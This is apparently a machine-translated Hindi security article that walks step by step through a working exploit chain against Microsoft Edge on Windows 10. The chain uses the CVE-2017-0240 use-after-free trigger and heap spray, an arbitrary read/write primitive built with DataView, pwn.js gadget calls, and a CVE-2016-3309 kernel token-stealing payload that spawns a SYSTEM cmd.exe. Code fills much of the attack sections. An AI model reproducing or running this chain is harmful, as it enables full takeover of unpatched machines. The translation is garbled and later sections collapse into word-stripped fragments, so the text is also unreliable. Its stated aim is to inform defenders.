💐 👟 👨🏾‍⚕️ विंडोज 10 पर सीवीई से आरसीई तक माइक्रोसॉफ्ट एज 🗓️ 🙀 🤐

पहचान

इस आलेख के ढांचे में, हम सैंडबॉक्स से बाद में बाहर निकलने के साथ, माइक्रोसॉफ्ट एज में एक भेद्यता के लिए एक शोषण लिखने की प्रक्रिया के बारे में पर्याप्त विस्तार से विचार करेंगे। यदि आप यह जानने में रुचि रखते हैं कि यह प्रक्रिया कैसी दिखती है, तो बिल्ली के नीचे आपका स्वागत है!

परिचय

मॉन्ट्रियल में नवीनतम Pwn2Own 2019 में, ब्राउज़रों की श्रेणी में, Microsoft Edge को हैक करने के लिए एक शोषण का प्रदर्शन किया गया था। इसके लिए दो कमजोरियों का उपयोग किया गया था: रेंडरर में double free और सैंडबॉक्स से बाहर निकलने के लिए एक तार्किक भेद्यता। इन दो कमजोरियों को हाल ही में बंद कर दिया गया था और उन्हें संबंधित CVE : CVE-2019-0940 और CVE-2019-0938 । आप ब्लॉग में कमजोरियों के बारे में अधिक पढ़ सकते हैं: Pwn2Own 2019: Microsoft एज रेंडरर शोषण (CVE-2019-0940)। भाग 1 और Pwn2Own 2019: माइक्रोसॉफ्ट एज़ सैंडबॉक्स एस्केप (CVE-2019-0938)। भाग २

हमारे लेख के भाग के रूप में, हम इस तरह के कारनामे को लिखने की प्रक्रिया को दिखाना चाहते हैं और इसके लिए Windows 10 पर Microsoft Edge के उदाहरण का उपयोग करके CVE-2017-0240 और CVE-2016-3309 का उपयोग करने के लिए कितना समय और संसाधनों की आवश्यकता है। मतभेदों में से एक यह होगा कि यदि Pwn2Own पर Pwn2Own गए शोषण ने सैंडबॉक्स से बाहर निकलने के लिए तार्किक भेद्यता का उपयोग किया है, तो हमारे परिदृश्य में, सैंडबॉक्स से बाहर निकलने के लिए Windows 10 कर्नेल में भेद्यता का उपयोग किया जाएगा। Microsoft शो से पैच के रूप में, कर्नेल में सैंडबॉक्स के कार्यान्वयन में कमजोरियों की तुलना में बहुत अधिक कमजोरियां हैं। नतीजतन, कमजोरियों की ऐसी श्रृंखला का सामना करने की अधिक संभावना है, और कंपनियों में आईएस कर्मचारियों के लिए जानना उपयोगी होगा।

स्रोत डेटा

यह आलेख Microsoft Edge ब्राउज़र के लिए 1-दिवसीय शोषण लिखने की प्रक्रिया को कवर करेगा। CVE-2017-0240 संचालित किया जाएगा। ऑपरेशन का पहला चरण स्रोत [1] से सामग्रियों के आधार पर होगा, हम एक arbitrary address read/write आदिम, और विभिन्न तकनीकों से भी परिचित होंगे जो ऐसी कमजोरियों का फायदा उठाने में उपयोगी हो सकते हैं। इसके बाद, हम आपको pwn.js टूल से pwn.js , जो आपको मनमाने ढंग से पढ़ने और लिखने के आधार पर मनमाने कार्यों के लिए एक कॉल प्राप्त करने में मदद करेगा, और उन्हें mitigations विभिन्न mitigations और तरीकों पर भी विचार करेगा। अंतिम चरण में, विंडोज़ CVE-2016-3309 कर्नेल भेद्यता विशेषाधिकारों को बढ़ाने, AppContainer प्रतिबंधों को AppContainer करने और हमला मशीन पर पूर्ण नियंत्रण हासिल करने के लिए शोषण किया जाएगा।

ऑपरेशन को Microsoft Windows 10 Pro 1703 (10.0.15063) और Microsoft Edge (40.15063.0.0) ब्राउज़र Microsoft Edge (40.15063.0.0) साथ स्टैंड पर किया जाएगा।

चरण 1. आदिम `arbitrary address read/write` एक `arbitrary address read/write` प्राप्त करना

भेद्यता और `OOB` प्राप्त करने का विवरण

ऑडियो बफर ऑब्जेक्ट की कॉपीफ्रॉमचैनल विधि में टाइप use-after-free एक भेद्यता मौजूद है।

AudioBuffer मेमोरी में स्थित एक छोटी ऑडियो परिसंपत्ति का इंटरफ़ेस है और AudioContext.decodeAudioData () विधि का उपयोग करके ऑडियो फ़ाइल से बनाया गया है, या AudioContext.createBuffer () विधि का उपयोग करके स्रोत डेटा से। AudioBuffer में रखे गए ऑडियो डेटा को AudioBufferSourceNode में वापस खेला जा सकता है।

The Advanced Exploitation of 64-bit Edge Browser Use-After-Free Vulnerability on Windows 10 वल्नरेबिलिटी की The Advanced Exploitation of 64-bit Edge Browser Use-After-Free Vulnerability on Windows 10 प्रस्तुति भेद्यता और पैच का विस्तृत विश्लेषण प्रदान करती है। जब copyFromChannel विधि को copyFromChannel , तो ऑडियो बफर चैनल की सामग्री को पहले तर्क द्वारा निर्दिष्ट destination बफर में कॉपी किया destination है। विधि चैनल नंबर ( channelNumber ) और ऑडियो बफर ( startInChannel ) में ऑफसेट को भी स्वीकार करती है, जिसमें से प्रतिलिपि बनाना आवश्यक है। CDOMAudioBuffer::Var_copyFromChannel में सीधे destination डेटा की प्रतिलिपि बनाने से पहले CDOMAudioBuffer::Var_copyFromChannel फ़ंक्शन, destination बफ़र कैश किया गया है (स्टैक पर स्थानीय फ़ंक्शन चर में बफर का पता और आकार संग्रहीत किया जाता है) और channelNumber और startInChannel ऑब्जेक्ट मानों को Int प्रकार में startInChannel जाता है, जिसके लिए startInChannel ऑब्जेक्ट के मान विधि। भेद्यता यह है कि एक कैश्ड बफर को valueOf ऑब्जेक्ट की ओवरराइड विधि में रूपांतरण के समय मुक्त किया जा सकता है। सत्यापन के लिए, हम निम्नलिखित कोड का उपयोग करते हैं:

 // ,     var t2 = new Float32Array(0x20000); var ta = new Uint8Array(t2.buffer); for (i=0;i<t2.length;i++) t2[i] = 0x66; var myctx = new AudioContext(); var audioBuf = myctx.createBuffer(1, 0x25, 22050); //   -   var t = audioBuf.getChannelData(0); var ta2 = new Uint8Array(t.buffer); for(i=0;i<ta2.length;i++) ta2[i]=0x55; //     valueOf var obj = { valueOf: function () { //   var worker = new Worker('worker.js'); worker.postMessage(0, [t2.buffer]); worker.terminate(); worker = null; //    sleep(1000); return 0; } }; //   audioBuf.copyFromChannel(t2, obj, 0);

यह कोड बफर को मुक्त करने के लिए Web Workers तकनीक का उपयोग करता है। खाली Worker , हम उसे postMessage पद्धति का उपयोग करके एक संदेश भेज सकते हैं। इस पद्धति का दूसरा वैकल्पिक transfer तर्क Transferable वस्तुओं ( ArrayBuffer , MessagePost या ImageBitmap ) की एक सरणी लेता है, ऑब्जेक्ट के अधिकार Worker को स्थानांतरित कर दिए जाएंगे और ऑब्जेक्ट वर्तमान संदर्भ में उपलब्ध नहीं होगा, इसलिए इसे हटाया जा सकता है। इसके बाद, sleep लिए एक कॉल होता है - एक फ़ंक्शन जो अस्थायी रूप से एक कार्यक्रम के निष्पादन को रोकता है (इसे स्वतंत्र रूप से लागू किया जाता है)। यह आवश्यक है ताकि कचरा संग्रहण प्रणाली ( GC , Garbage Collector ) बफर को मुक्त करने का प्रबंधन करे, जिन अधिकारों को हस्तांतरित किया गया था।

वेब वर्कर्स पृष्ठभूमि थ्रेड में स्क्रिप्ट चलाने का एक सरल साधन प्रदान करते हैं। वर्कर थ्रेड उपयोगकर्ता इंटरफ़ेस के साथ हस्तक्षेप किए बिना कार्य कर सकता है। इसके अलावा, वे XMLHttpRequest का उपयोग करके I / O कर सकते हैं (हालांकि responseXML और चैनल विशेषताएँ हमेशा रिक्त रहेंगी)। एक मौजूदा कार्यकर्ता इस कोड (और इसके विपरीत) द्वारा निर्दिष्ट हैंडलर के माध्यम से निर्माता कोड को जावास्क्रिप्ट संदेश भेज सकता है।

इस कोड को एज में डीबगर के तहत चलाकर, आप निम्न क्रैश प्राप्त कर सकते हैं।

चरण 01 दुर्घटना

नतीजतन, copyFromChannel कॉल ऑडियो बफर की सामग्री को बिना मेमोरी वाले क्षेत्र में कॉपी करने की कोशिश करता है। भेद्यता का दोहन करने के लिए, इस मेमोरी क्षेत्र में किसी भी ऑब्जेक्ट के आवंटन को प्राप्त करना आवश्यक है। इस मामले में, सरणी खंड एकदम सही है।

Chakra में Chakra ( Edge ब्राउज़र में प्रयुक्त JS इंजन) निम्नानुसार व्यवस्थित की जाती हैं: सरणी ऑब्जेक्ट का एक निश्चित आकार होता है, सरणी ऑब्जेक्ट्स (या मान, IntArray के मामले में IntArray ) को एक अलग मेमोरी एरिया - सेगमेंट में संग्रहीत किया जाता है, जो सूचक ऑब्जेक्ट में निहित है। सरणी। सेगमेंट हेडर में सेगमेंट के आकार सहित विभिन्न जानकारी होती है, जो एरे के आकार से मेल खाती है। सरणी का आकार भी सरणी ऑब्जेक्ट में ही मौजूद है। योजनाबद्ध रूप से, यह इस तरह दिखता है:

सरणी संरचना

इस प्रकार, यदि हम पहले से मुक्त किए गए स्थान में सरणी खंड का चयन करने का प्रबंधन करते हैं, तो हम ऑडियो बफर की सामग्री के साथ सरणी खंड के हेडर को ओवरराइट कर सकते हैं। ऐसा करने के लिए, हम sleep(1000); बाद निम्नलिखित पंक्तियों को जोड़कर ऊपर दिए गए कोड को संशोधित करते हैं sleep(1000); :

 ... /*        ,    .   arr        */ arr = new Array(128); for(var i = 0; i < arr.length; i++) { arr[i] = new Array(0x3ff0); for(var j = 0; j < arr[i].length; j++) arr[i][j] = 0x30303030; } ...

सरणियों का आकार इसलिए चुना जाता है कि सरणी खंड का आकार पूरे ढेर खंड (ढेर स्मृति का न्यूनतम अविभाज्य टुकड़ा, जिसका आकार 0x10000 बाइट्स है) पर कब्जा कर लेता है। इस कोड को चलाएं, memcpy फंक्शन को ब्रेकपॉइंट के रूप में निर्दिष्ट करें (इसमें कई memcpy कॉल होंगे, इसलिए यह edgehtml!WebCore::AudioBufferData::copyBufferData पर पहले बंद करने के लिए समझ में आता है edgehtml!WebCore::AudioBufferData::copyBufferData ), जिसमें दुर्घटना हुई। हमें निम्न परिणाम मिलते हैं:

चरण 02

बहुत बढ़िया! अब हम अपने स्वयं के मूल्यों के साथ सरणी सेगमेंट के हेडर को ओवरराइट कर सकते हैं। इस मामले में सबसे दिलचस्प मूल्य सरणी के आकार हैं, जिनकी ऑफसेट हम ऊपर स्क्रीनशॉट में देख सकते हैं। ऑडियो बफर की सामग्री को निम्नानुसार बदलें:

 ... var t = audioBuf.getChannelData(0); var ta2 = new Uint32Array(t.buffer); ta2[0] = 0; ta2[1] = 0; ta2[2] = 0xffe0; ta2[3] = 0; ta2[4] = 0; ta2[5] = 0; ta2[6] = 0xfba6; ta2[7] = 0; ta2[8] = 0; ta2[9] = 0x7fffffff - 2; ta2[10] = 0x7fffffff; ta2[11] = 0; ta2[12] = 0; ta2[13] = 0; ta2[14] = 0x40404040; ta2[15] = 0x50505050; ...

ta2[14] और ta2[15] के मूल्यों पर ध्यान दें - वे पहले से ही सेगमेंट हेडर के लिए नहीं, बल्कि खुद ऐरे वैल्यू का उल्लेख करते हैं। इसके साथ, हम वैश्विक अरै सरणी में आवश्यक सरणी को निर्धारित कर सकते हैं:

 ... for(var i = 0; i < arr.length; i++) { if(arr[i][0] == 0x40404040 && arr[i][1] == 0x50505050) { alert('Target array idx: ' + i); target_idx = i; target_arr = arr[i]; break; } }

यदि एक परिणाम के रूप में एक सरणी मिली, तो पहले दो तत्वों को एक निश्चित तरीके से बदल दिया गया था, फिर सब कुछ ठीक है। अब हमारे पास एक ऐसा सरणी है जिसका खंड आकार वास्तव में इससे बड़ा है। शेष सरणियों को मुक्त किया जा सकता है।

यहां यह याद रखना आवश्यक है कि सरणी का आकार दो संस्थाओं में मौजूद है: सरणी ऑब्जेक्ट में, जहां यह अपरिवर्तित रहा, और सरणी सेगमेंट में, जहां हमने इसे बढ़ाया। यह पता चला है कि कोड ऑब्जेक्ट को JIT मोड में निष्पादित किया गया है और अनुकूलित किया गया है, तो सरणी ऑब्जेक्ट में आकार को अनदेखा किया गया है। यह आसानी से प्राप्त किया जाता है, उदाहरण के लिए, इस प्रकार है:

 function arr_get(idx) { return target_arr[idx]; } function arr_set(idx, val) { target_arr[idx] = val; } for(var i = 0; i < 0x3ff0; i++) { arr_set(i, arr_get(i)); }

उसके बाद, arr_get और arr_set का उपयोग करते हुए arr_set आप सरणी ( OOB , out-of-bound ) की सीमाओं से परे जा सकते हैं।

`OOB` का उपयोग एक मनमाने पते पर पढ़ने और लिखने के आदिम प्राप्त करने के लिए

इस खंड में, हम एक ऐसी तकनीक पर विचार करते हैं जो आपको OOB का उपयोग करके एक मनमाने पते पर पढ़ने और लिखने की अनुमति देती है। जिस विधि से हम इसे प्राप्त करते हैं वह स्रोत [1] में उपयोग किए जाने वाले समान होगा, लेकिन इसमें महत्वपूर्ण बदलाव भी होंगे।

Edge के उपयोग किए गए संस्करण में Edge ढेर के लिए मेमोरी ब्लॉकों को क्रमिक रूप से आवंटित किया जाता है, जिसके कारण, बड़ी संख्या में किसी भी ऑब्जेक्ट को आवंटित करते समय, जितनी जल्दी या बाद में वे सरणी सेगमेंट के बाद दिखाई देंगे, जिसके आगे हम जा सकते हैं।

सबसे पहले, यह हमें ऑब्जेक्ट तरीकों ( vftable ) की एक आभासी तालिका के लिए एक पॉइंटर पढ़ने की क्षमता देता है, जिससे हम प्रक्रिया पता स्थान ( vftable ) के यादृच्छिककरण को बायपास कर सकते हैं। लेकिन किन वस्तुओं तक पहुँचने से हमें मनमाने ढंग से पढ़ने और लिखने में मदद मिलेगी? DataView ऑब्जेक्ट की एक जोड़ी इसके लिए महान है।

प्लेटफ़ॉर्म बाइट ऑर्डर की परवाह किए बिना DataView एक बाइनरी ArrayBuffer में कई संख्यात्मक प्रकारों को पढ़ने और लिखने के लिए एक निम्न-स्तरीय इंटरफ़ेस प्रदान करता है।

DataView की आंतरिक संरचना में एक बफर के लिए एक पॉइंटर होता है। एक मनमाने पते पर पढ़ने और लिखने के लिए, उदाहरण के लिए, हम दो DataView ( dv1 और dv2 ) की एक श्रृंखला का निर्माण इस प्रकार कर सकते हैं: dv1 बफर के रूप में dv1 सरणी तक dv2 पता dv2 को निर्दिष्ट करें। अब dv1 का उपयोग करके हम dv2 बफर के पते को बदल सकते हैं, जिसके कारण मनमाने ढंग से पढ़ना और लिखना हासिल होता है। योजनाबद्ध रूप से, इसे निम्नानुसार दर्शाया जा सकता है:

मनमाना संबोधन पढ़े / लिखे

इस पद्धति का उपयोग करने के लिए, आपको यह जानने की आवश्यकता है कि स्मृति में वस्तुओं के पते कैसे निर्धारित करें। ऐसा करने के लिए, निम्न तकनीक मौजूद है: आपको एक नया Array बनाने की जरूरत है, इसकी vftable और typeId (संरचना के पहले दो 64-बिट फ़ील्ड) को बचाने के लिए vftable उपयोग करें और उस ऑब्जेक्ट को असाइन करें जिसके लिए पता एरे के पहले तत्व के लिए ब्याज का है। उसके बाद, आपको पहले से सहेजे गए vftable और typeId को पुनर्स्थापित करना होगा। अब ऑब्जेक्ट के पते के जूनियर और सीनियर डबल शब्द को सरणी के पहले और दूसरे तत्व का संदर्भ देकर प्राप्त किया जा सकता है। तथ्य यह है कि, डिफ़ॉल्ट रूप से, नया सरणी IntArray , और सरणी के 4-बाइट मान अपने खंड में संग्रहीत हैं जैसे वे हैं। किसी ऑब्जेक्ट को किसी ऐरे में असाइन करते समय, ऐरे ऑब्जेक्ट ऑब्जेक्ट में बदल जाता है, और इसके सेगमेंट का उपयोग ऑब्जेक्ट्स के एड्रेस को स्टोर करने के लिए किया जाता है। रूपांतरण परिवर्तनशील और typeId । तदनुसार, यदि हम मूल मानों को vftable और typeId , तो इस सरणी के तत्वों के माध्यम से हम सीधे खंड तक पहुंच सकते हैं। योजनाबद्ध रूप से वर्णित प्रक्रिया को निम्नानुसार दर्शाया जा सकता है:

सूचक रिसाव

पता प्राप्त करने का कार्य कुछ इस प्रकार होगा:

 function addressOf(obj) { var hdr_backup = new Array(4); //  vftable  typeId intarr_object for(var i = 0; i < 4; i++) hdr_backup[i] = arr_get(intarr_idx + i); intarr_object[0] = obj; //  vftable  typeId intarr_object for(var i = 0; i < 4; i++) arr_set(intarr_idx + i, hdr_backup[i]); //         return [intarr_object[0], intarr_object[1]]; }

एक खुला प्रश्न OOB का उपयोग करके आवश्यक वस्तुओं और उनकी खोज का निर्माण रहता है। जैसा कि पहले उल्लेख किया गया है, जब बड़ी संख्या में ऑब्जेक्ट आवंटित करते हैं, तो जल्दी या बाद में वे सरणी सेगमेंट के बाद बाहर खड़े होने लगेंगे, जिसके आगे हम जा सकते हैं। आवश्यक वस्तुओं को खोजने के लिए, आपको आवश्यक वस्तुओं की तलाश में सरणी के बाहर सूचकांकों से गुजरना होगा। क्योंकि एक ही प्रकार की सभी वस्तुएं ढेर के एक खंड में स्थित हैं, आप खोज को अनुकूलित कर सकते हैं और 0x10000 वेतन वृद्धि में ढेर के खंडों के माध्यम से जा सकते हैं, और ढेर के प्रत्येक खंड की शुरुआत से केवल पहले कुछ मूल्यों की जांच कर सकते हैं। ऑब्जेक्ट्स की पहचान करने के लिए, आप उन्हें कुछ मापदंडों के लिए अद्वितीय मान सेट कर सकते हैं (उदाहरण के लिए, DataView यह byteOffset हो सकता है) या, ऑब्जेक्ट की संरचना में पहले से ही ज्ञात स्थिरांक का उपयोग करके (उदाहरण के लिए, IntArray में Edge के उपयोग किए गए संस्करण में, मान 0x10005 हमेशा 0x18 पर पाया जाता है)।

उपरोक्त सभी तकनीकों को मिलाकर, आप एक मनमाने पते पर पढ़ सकते हैं और लिख सकते हैं। नीचे DataView मेमोरी ऑब्जेक्ट्स पढ़ने का स्क्रीनशॉट है।

स्मृति रिसाव

चरण 2. मनमाने ढंग से एपीआई कार्य करना

इस स्तर पर, हम Edge कंटेंट को प्रदर्शित करने की प्रक्रिया के अंदर एक मनमाने पते पर पढ़ने और लिखने में सक्षम थे। मुख्य तकनीकों पर विचार करें जो कि आवेदन के आगे के संचालन और उनके वर्कअराउंड में हस्तक्षेप करना चाहिए। हमने पहले से ही लेख app specific security mitigation ( भाग 1, परिचयात्मक , भाग 2, इंटरनेट एक्सप्लोरर और एज , भाग 3, Google क्रोम ) की एक छोटी श्रृंखला लिखी थी, लेकिन ध्यान रखें कि डेवलपर्स अभी भी खड़े नहीं हैं और अपने उत्पादों में नए उपकरण जोड़ें सुरक्षा।

पता स्थान रैंडमाइजेशन ( `ASLR` )

ASLR (संलग्न पता स्थान लेआउट रैंडमाइजेशन) ऑपरेटिंग सिस्टम में उपयोग की जाने वाली एक तकनीक है जो प्रक्रिया पता स्थान में महत्वपूर्ण डेटा संरचनाओं के स्थान को बेतरतीब ढंग से बदलती है, अर्थात्: निष्पादन योग्य फ़ाइल छवियां, लोड की गई लाइब्रेरी, ढेर और ढेर।

ऊपर, हमने वर्चुअल क्लास टेबल के पतों को पढ़ना सीखा, उनका उपयोग करके, हम आसानी से Chakra.dll मॉड्यूल के आधार पते की गणना कर सकते हैं, इसलिए ASLR आगे के संचालन के लिए समस्याएं पेश नहीं करता है।

डेटा निष्पादन संरक्षण ( `DEP` , `NX` )

डेटा निष्पादन रोकथाम (डीईपी) लिनक्स, मैक ओएस एक्स, एंड्रॉइड और विंडोज में निर्मित एक सुरक्षा सुविधा है जो किसी एप्लिकेशन को "डेटा केवल" के रूप में चिह्नित मेमोरी क्षेत्र से कोड निष्पादित करने से रोकता है। यह कुछ हमलों को रोक देगा, जो उदाहरण के लिए, बफर ओवरफ्लो का उपयोग करके ऐसे क्षेत्र में कोड को बचाते हैं।

इस सुरक्षा के आसपास एक तरीका है VirtualAlloc श्रृंखलाओं का उपयोग करके VirtualAlloc को कॉल VirtualAlloc । लेकिन Edge के मामले में Edge यह विधि ACG (नीचे देखें) के कारण काम नहीं करेगी।

नियंत्रण प्रवाह गार्ड ( `CFG` )

CFG एक सुरक्षा तंत्र है जिसका उद्देश्य उपयोगकर्ता और कर्नेल-मोड अनुप्रयोगों में द्विआधारी कमजोरियों के दोहन की प्रक्रिया को जटिल बनाना है। इस तंत्र के काम में अप्रत्यक्ष कॉल को मान्य करना शामिल है, जो एक हमलावर को निष्पादन थ्रेड को रोकने से रोकता है (उदाहरण के लिए, वर्चुअल फ़ंक्शन की तालिका को ओवरराइट करके)

यह तकनीक केवल अप्रत्यक्ष कॉल को नियंत्रित करती है, उदाहरण के लिए, ऑब्जेक्ट फ़ंक्शन के वर्चुअल टेबल से विधि कॉल। स्टैक पर रिटर्न पते नियंत्रित नहीं हैं, और इसका उपयोग ROP श्रृंखला बनाने के लिए किया जा सकता है। ROP/JOP/COP चेन का भविष्य में उपयोग Intel नई तकनीक द्वारा Control-flow Enforcement Technology किया जा सकता है: Control-flow Enforcement Technology ( CET )। इस तकनीक में दो भाग होते हैं:

Shadow Stack (छाया ढेर) - रिटर्न पतों को नियंत्रित करने के लिए उपयोग किया जाता है और ROP श्रृंखलाओं से बचाता है;
Indirect Branch Tracking JOP/COP चेन के खिलाफ सुरक्षा का एक तरीका है। यह एक नया ENDBRANCH निर्देश है, जो call और jmp निर्देशों के लिए सभी वैध संक्रमण पते jmp करता है।

मनमाना कोड गार्ड ( `ACG` )

ACG एक ऐसी तकनीक है जो डायनेमिक कोड जेनरेशन को रोकती है (यह rwx का उपयोग करके मेमोरी के क्षेत्रों को आवंटित करने से मना किया जाता है) और इसके संशोधनों (निष्पादन योग्य के रूप में मौजूदा मेमोरी क्षेत्र को VirtaulAlloc करना असंभव है)

यह सुरक्षा, CFG तरह, ROP श्रृंखलाओं के उपयोग को नहीं रोकती है।

AppContainer अलगाव

AppContainer एक Microsoft तकनीक है जो आपको सैंडबॉक्स वातावरण में चलाकर किसी प्रक्रिया को अलग करने की अनुमति देती है। यह तकनीक प्रक्रिया को क्रेडेंशियल्स, डिवाइस, फाइल सिस्टम, नेटवर्क, अन्य प्रक्रियाओं और खिड़कियों तक पहुंच को प्रतिबंधित करती है और इसका उद्देश्य दुर्भावनापूर्ण सॉफ़्टवेयर की क्षमता को कम करना है जो प्रक्रिया में मनमाने कोड को निष्पादित करने की क्षमता रखता है।

यह सुरक्षा ऑपरेशन प्रक्रिया को बहुत जटिल करती है। इसकी वजह से, हम तृतीय-पक्ष निष्पादन योग्य फ़ाइल या संवेदनशील उपयोगकर्ता जानकारी को मेमोरी में या डिस्क पर नहीं कह सकते हैं। हालाँकि, यह सुरक्षा AppContainer सैंडबॉक्स के कार्यान्वयन में कमजोरियों का उपयोग करके या ओएस के कर्नेल में कमजोरियों का दोहन करके विशेषाधिकारों को बढ़ाकर किया जा सकता है।

यह ध्यान देने योग्य है कि Microsoft पास security mitigation तकनीकों को दरकिनार करने की तकनीकों के लिए एक अलग इनाम कार्यक्रम है। कार्यक्रम इंगित करता है कि निष्पादन योग्य कोड का पुन: उपयोग ( ROP श्रृंखला का निर्माण इस तकनीक का एक प्रकार है) कार्यक्रम के तहत नहीं आता है, क्योंकि एक वास्तुशिल्प मुद्दा है।

Pwn.js का उपयोग करना

सभी सुरक्षा तकनीकों के विश्लेषण से, यह निम्नानुसार है कि मनमाने कोड को निष्पादित करने में सक्षम होने के लिए, आपको AppContainer सैंडबॉक्स को बायपास करने की आवश्यकता है। इस लेख में, हम Windows कर्नेल में भेद्यता का उपयोग करते हुए एक विधि का वर्णन करते हैं। इस स्थिति में, हम केवल JS कोड और ROP चेन का उपयोग कर सकते हैं। केवल ROP श्रृंखलाओं का उपयोग करके कर्नेल के लिए एक शोषण लिखना बहुत मुश्किल हो सकता है। इस कार्य को सरल बनाने के लिए, आप गैजेट का एक सेट पा सकते हैं जिसके साथ हम आवश्यक WinAPI विधियों को कॉल कर सकते हैं। सौभाग्य से, यह पहले से ही pwn.js लाइब्रेरी में लागू है। इसका उपयोग करते हुए, केवल read और write कार्यों को मनमाने ढंग से पढ़ने और लिखने के लिए वर्णित करने के बाद, आप आवश्यक WinAPI कार्यों को खोजने और उन्हें कॉल करने के लिए एक सुविधाजनक API प्राप्त कर सकते हैं। pwn.js 64-बिट मान और पॉइंटर्स और टूल के साथ काम करने के लिए टूल के साथ काम करने के लिए एक सुविधाजनक उपकरण प्रदान करता है।

एक साधारण उदाहरण पर विचार करें। पिछले चरण में, हमें दो संबंधित DataView की एक श्रृंखला मिली। शोषण तैयार करने के लिए, आपको निम्न वर्ग बनाना होगा:

 var Exploit = (function() { var ChakraExploit = pwnjs.ChakraExploit; var Integer = pwnjs.Integer; function Exploit() { ChakraExploit.call(this); ... //  arbitrary address read/write    ... // DataView,         this.dv = ...; // DataView,     this.dv this.dv_offset = ...; //    Chakra.dll, ,     var vtable = ...; this.initChakra(vtable); } Exploit.prototype = Object.create(ChakraExploit.prototype); Exploit.prototype.constructor = Exploit; Exploit.prototype.set_dv_address = function(lo, hi) { this.dv_offset.setInt32(0x38, lo, true); this.dv_offset.setInt32(0x3c, hi, true); } Exploit.prototype.read = function (address, size) { this.set_dv_address(address.low, address.high); switch (size) { case 8: return new Integer(this.dv.getInt8(0, true), 0, true); case 16: return new Integer(this.dv.getInt16(0, true), 0, true); case 32: return new Integer(this.dv.getInt32(0, true), 0, true); case 64: return new Integer(this.dv.getInt32(0, true), this.dv.getInt32(4, true), true); } } Exploit.prototype.write = function (address, value, size) { this.set_dv_address(address.low, address.high); switch (size) { case 8: this.dv.setInt8(0, value.low, true); break; case 16: this.dv.setInt16(0, value.low, true); break; case 32: this.dv.setInt32(0, value.low, true); break; case 64: this.dv.setInt32(0, value.low, true); this.dv.setInt32(4, value.high, true); break; } } return Exploit; })();

, MessageBoxA :

 function run() { with (new Exploit()) { //alert('Chakra: ' + chakraBase.toString(16)); var MessageBoxA = importFunction('user32.dll', 'MessageBoxA', Int32); var GetActiveWindow = importFunction('user32.dll', 'GetActiveWindow', Int64); var hwnd = GetActiveWindow(); var ret = MessageBoxA(hwnd, new CString('PWNED'), new CString('PWNED'), 0); } }

PWNED

3.

WinAPI . . CVE-2016-3309 . [7] [8], pwn.js [2] , GDI -. [9], [10] [11]. . , . , AppContainer , pwn.js . cmd.exe SYSTEM .

GDI — Windows , , .

, . JS - 64- kernel_read_64 kernel_write_64 , . Windows. BITMAP , . pwn.js . BITMAP , , :

 var BITMAP = new StructType([ ['poolHeader', new ArrayType(Uint32, 4)], // BASEOBJECT64 ['hHmgr', Uint64], ['ulShareCount', Uint32], ['cExclusiveLock', Uint16], ['BaseFlags', Uint16], ['Tid', Uint64], ['dhsurf', Uint64], ['hsurf', Uint64], ['dhpdev', Uint64], ['hdev', Uint64], ['sizlBitmap', SIZEL], ['cjBits', Uint32], ['pvBits', Uint64], ['pvScan0', Uint64], ]);

Tid KTHREAD , , , EmpCheckErrataList , . , :

 ... var nt_EmpCheckErrataList_ptr = worker_bitmap_obj.Tid.add(0x2a8); var nt_EmpCheckErrataList = kernel_read_64(nt_EmpCheckErrataList_ptr); /* g_config   ,         empCheckErrataList  WinDbg        : ? nt!EmpCheckErrataList - nt */ var ntoskrnl_base_address = nt_EmpCheckErrataList.sub( g_config.nt_empCheckErrataList_offset); ...

, AppContainer . AppContainer IsPackagedProcess ( Process Environment Block , PEB ), . Access Token , AppContainer . Access Token , . Access Token , . EPROCESS ActiveProcessLinks , . PEB EPROCESS . PsInitialSystemProcess , , ActiveProcessLinks .

Edge : , Edge . SYSTEM . , , winlogon.exe .

pwn.js :

 //  PEB   var pinfo = _PROCESS_BASIC_INFORMATION.Ptr.cast(malloc(_PROCESS_BASIC_INFORMATION.size)); var pinfo_sz = Uint64.Ptr.cast(malloc(8)); NtQueryInformationProcess(GetCurrentProcess(), 0, pinfo, _PROCESS_BASIC_INFORMATION.size, pinfo_sz); var peb = pinfo.PebBaseAddress; /*    IsPackagedProcess       peb   char * */ var bit_field = peb[3]; bit_field = bit_field.xor(1 << 4); peb[3] = bit_field; /*             WinDbg    .     : dt ntdll!_EPROCESS uniqueprocessid token activeprocesslinks           */ var ActiveProcessLinks = system_eprocess.add( g_config.ActiveProcessLinksOffset); var current_pid = GetCurrentProcessId(); var current_eprocess = null; var winlogon_pid = null; // winlogon.exe -  ,     cmd.exe var winlogon = new CString("winlogon.exe"); var image_name = malloc(16); var system_pid = kernel_read_64(system_eprocess.add( g_config.UniqueProcessIdOffset)); while(!current_eprocess || !winlogon_pid) { var eprocess = kernel_read_64(ActiveProcessLinks).sub( g_config.ActiveProcessLinksOffset); var pid = kernel_read_64(eprocess.add( g_config.UniqueProcessIdOffset)); //        //   Uint64.store( image_name.address, kernel_read_64(eprocess.add(g_config.ImageNameOffset)) ); Uint64.store( image_name.address.add(8), kernel_read_64(eprocess.add(g_config.ImageNameOffset + 8)) ); //   winlogon.exe    if(_stricmp(winlogon, image_name).eq(0)) { winlogon_pid = pid; } if (current_pid.eq(pid)) { current_eprocess = eprocess; } //        ActiveProcessLinks = eprocess.add( g_config.ActiveProcessLinksOffset); } //     var sys_token = kernel_read_64(system_eprocess.add(g_config.TokenOffset)); //          //   winlogon.exe var pi = malloc(24); memset(pi, 0, 24); var si = malloc(104 + 8); memset(si, 0, 104 + 8); Uint32.store(si.address, new Integer(104 + 8)); var args = WString("cmd.exe"); var AttributeListSize = Uint64.Ptr.cast(malloc(8)); InitializeProcThreadAttributeList(0, 1, 0, AttributeListSize); var lpAttributeList = malloc(AttributeListSize[0]); Uint64.store( si.address.add(104), lpAttributeList ); InitializeProcThreadAttributeList(lpAttributeList, 1, 0, AttributeListSize) var winlogon_handle = Uint64.Ptr.cast(malloc(8)); //       kernel_write_64(current_eprocess.add(g_config.TokenOffset), sys_token); /*        AppContainer,       winlogon.exe         winlogon.exe */ winlogon_handle[0] = OpenProcess(PROCESS_ALL_ACCESS, 0, winlogon_pid); UpdateProcThreadAttribute(lpAttributeList, 0, PROC_THREAD_ATTRIBUTE_PARENT_PROCESS, winlogon_handle, 8, 0, 0); CreateProcess(0, args, 0, 0, 0, EXTENDED_STARTUPINFO_PRESENT, 0, 0, si, pi);

Final

YouTube , Microsoft Edge.

परिणाम

, Edge Windows , 13 , CVE-2017-0240 , . CVE-2016-3309 .
JS
666 JS
: cmd.exe SYSTEM ,

, , . , , . .

विंडोज 10 पर सीवीई से आरसीई तक माइक्रोसॉफ्ट एज

परिचय

स्रोत डेटा

